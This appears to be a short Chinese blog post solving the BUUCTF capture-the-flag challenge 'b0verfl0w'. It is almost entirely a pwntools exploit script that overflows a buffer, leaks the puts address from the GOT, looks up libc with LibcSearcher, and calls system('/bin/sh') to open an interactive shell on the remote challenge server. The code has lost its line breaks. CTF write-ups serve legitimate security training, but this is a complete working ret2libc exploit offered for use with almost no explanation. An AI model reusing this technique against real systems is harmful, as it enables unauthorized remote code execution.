ret2libc做的,,,
from pwn import*from LibcSearcher import*context.log_level = 'debug'#libc = ELF('libc-2.232.so')#io = process('./b0verfl0w')io = remote("node4.buuoj.cn",28118)elf =ELF('./b0verfl0w')def debug():gdb.attach(io)pause()puts_plt = elf.plt['puts']puts_got = elf.got['puts']main_addr =0x0804850Eio.recvuntil("What's your name?")payload = b'a'*0x24+p32(puts_plt)+p32(main_addr)+p32(puts_got)io.sendline(payload)puts_addr =u32(io.recvuntil('\xf7')[-4:])print(hex(puts_addr))#system_addr = puts_addr -libc.sym['puts']+libc.sym['system']libc = LibcSearcher('puts',puts_addr)system_addr = puts_addr - libc.dump('puts')+libc.dump('system')bin_sh_addr = puts_addr- libc.dump('puts')+libc.dump('str_bin_sh')payload =b'a'*0x24+p32(system_addr)+p32(0)+p32(bin_sh_addr)io.recvuntil("What's your name?")io.sendline(payload)io.interactive()
若有收获,就点个赞吧
0 人点赞
